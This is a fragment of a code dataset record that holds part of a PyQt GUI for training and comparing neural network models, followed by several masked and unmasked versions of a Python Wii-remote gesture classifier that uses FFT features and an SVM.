myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n # print(self.dataFor['Tra'].DataTrainX, '\\n', self.dataFor['Tra'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')\n\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')\n\n # print(self.dataLossRate)\n # print(self.dataSetLossValue)\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')\n\n elif self.sender() is self.dataShowButtonT:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n ############## training module #################\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n # print(1)\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')\n\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n # print(self.trainingW)\n self.trainingW.show()\n return\n senderName = 'New'\n\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n\n senderName = 'Tra'\n\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\\\n < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n # print(self.trainingW)\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)\n\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n def showResult(self):\n\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')\n\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')\n\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'New')\n\n elif self.sender() is self.judgeResultButtonT:\n\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'Tra')\n # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')\n # self.mcbcnn.runCNN('Test', self.dataFor['New'])\n # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))\n # drawCM.plotConfuseMatrix()\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())",
"step-ids": [
9,
11,
12,
15,
18
]
}
|
[
9,
11,
12,
15,
18
] |
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
<|reserved_special_token_0|>
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
<|reserved_special_token_0|>
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
return 'More traininsdata for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in parsedGesture.trainingsData]
return self.c.predict(parsedGesture.frequencies[0])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
<|reserved_special_token_0|>
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
<|reserved_special_token_0|>
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
return 'More traininsdata for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in parsedGesture.trainingsData]
return self.c.predict(parsedGesture.frequencies[0])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
for gesture in self.parsedGestureList:
if len(gesture.trainingsData) <= 0:
return True
else:
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return '\na gesture has no trained samples'
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
def getFrequencies(self):
for gesture in self.parsedGestureList:
gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in gesture.trainingsData]
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
return 'More traininsdata for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in parsedGesture.trainingsData]
return self.c.predict(parsedGesture.frequencies[0])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
for gesture in self.parsedGestureList:
if len(gesture.trainingsData) <= 0:
return True
else:
return False
<|reserved_special_token_1|>
import numpy as np
from scipy import fft
import math
from sklearn import svm
from activity_recognition import WiiGesture
class WiiGestureClassifier:
"""
This class uses the FFT on the average of all three sensor values
to provide the training data for the SVM
Three good distinguishable gestures are:
Fast circle movement
Still, doing nothing
Fast swing movement from behind the shoulder (like a whip)
"""
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return '\na gesture has no trained samples'
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
def parseDataset(self, dataSet):
x = []
y = []
z = []
avg = []
for values in dataSet:
x.append(values[0] - 512)
y.append(values[1] - 512)
z.append(values[2] - 512)
avg.append((values[0] - 512 + values[1] - 512 + values[2] - 512
) / 3)
return avg
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
def getFrequencies(self):
for gesture in self.parsedGestureList:
gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in gesture.trainingsData]
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
return 'More traininsdata for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for
l in parsedGesture.trainingsData]
return self.c.predict(parsedGesture.frequencies[0])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
for gesture in self.parsedGestureList:
if len(gesture.trainingsData) <= 0:
return True
else:
return False
<|reserved_special_token_1|>
import numpy as np
from scipy import fft
import math
from sklearn import svm
from activity_recognition import WiiGesture
class WiiGestureClassifier():
"""
This class uses the FFT on the average of all three sensor values
to provide the training data for the SVM
Three good distinguishable gestures are:
Fast circle movement
Still, doing nothing
Fast swing movement from behind the shoulder (like a whip)
"""
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return "\na gesture has no trained samples"
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet)
for dataSet in gesture.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
def parseDataset(self, dataSet):
x = []
y = []
z = []
avg = []
#Use the difference from default sensor value
for values in dataSet:
x.append(values[0]-512)
y.append(values[1]-512)
z.append(values[2]-512)
avg.append((values[0]-512 + values[1]-512 + values[2]-512) / 3)
return avg
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.trainingsData]
def getFrequencies(self):
for gesture in self.parsedGestureList:
gesture.frequencies = [
np.abs(fft(l) / len(l))[1:len(l) / 2] for l in gesture.trainingsData]
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
return 'More traininsdata for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in parsedGesture.trainingsData]
parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for l in parsedGesture.trainingsData]
return self.c.predict(parsedGesture.frequencies[0])
def checkListForEmpty(self):
#checks for empty gestures and exits code
if len(self.parsedGestureList) <= 0:
return True
for gesture in self.parsedGestureList:
if len(gesture.trainingsData) <= 0:
return True
else:
return False
|
flexible
|
{
"blob_id": "0b7bba826b82c3751c072395431e17bc1dc9bb90",
"index": 6037,
"step-1": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n <mask token>\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n <mask token>\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n <mask token>\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n <mask token>\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-3": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return '\\na gesture has no trained samples'\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-4": "import numpy as np\nfrom scipy import fft\nimport math\nfrom sklearn import svm\nfrom activity_recognition import WiiGesture\n\n\nclass WiiGestureClassifier:\n \"\"\"\n This class uses the FFT on the average of all three sensor values\n to provide the training data for the SVM\n\n Three good distinguishable gestures are:\n Fast circle movement\n Still, doing nothing\n Fast swing movement from behind the shoulder (like a whip)\n \"\"\"\n\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return '\\na gesture has no trained samples'\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n\n def parseDataset(self, dataSet):\n x = []\n y = []\n z = []\n avg = []\n for values in dataSet:\n x.append(values[0] - 512)\n y.append(values[1] - 512)\n z.append(values[2] - 512)\n avg.append((values[0] - 512 + values[1] - 512 + values[2] - 512\n ) / 3)\n return avg\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-5": "import numpy as np\nfrom scipy import fft\nimport math\nfrom sklearn import svm\nfrom activity_recognition import WiiGesture\n\n\nclass WiiGestureClassifier():\n \"\"\"\n This class uses the FFT on the average of all three sensor values\n to provide the training data for the SVM\n\n Three good distinguishable gestures are:\n Fast circle movement\n Still, doing nothing\n Fast swing movement from behind the shoulder (like a whip)\n \"\"\"\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return \"\\na gesture has no trained samples\"\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet)\n for dataSet in gesture.trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n\n def parseDataset(self, dataSet):\n x = []\n y = []\n z = []\n avg = []\n #Use the difference from default sensor value\n for values in dataSet:\n x.append(values[0]-512)\n y.append(values[1]-512)\n z.append(values[2]-512)\n avg.append((values[0]-512 + values[1]-512 + values[2]-512) / 3)\n return avg\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [\n np.abs(fft(l) / len(l))[1:len(l) / 2] for l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n 